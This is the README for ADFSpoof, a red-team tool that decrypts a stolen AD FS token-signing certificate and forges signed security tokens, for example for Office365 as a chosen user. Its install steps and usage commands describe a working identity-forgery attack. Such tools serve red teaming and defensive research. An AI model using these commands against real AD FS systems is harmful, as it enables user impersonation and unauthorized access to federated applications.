ADFSpoof

Created by Doug Bienstock @doughsec while at Mandiant FireEye.

ADFSpoof has two main functions:

1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.

2. Given a signing key, produce a signed security token that can be used to access a federated application.

This tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof.

Install:

Note: ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available here.

git clone https://github.com/mandiant/ADFSpoof
pip install -r requirements.txt

Usage:

# Decrypt the EncryptedPFX and write to disk
python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump

# Generate a security token for Office365
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759

Full usage information can be found here.

Additional command examples can be found here.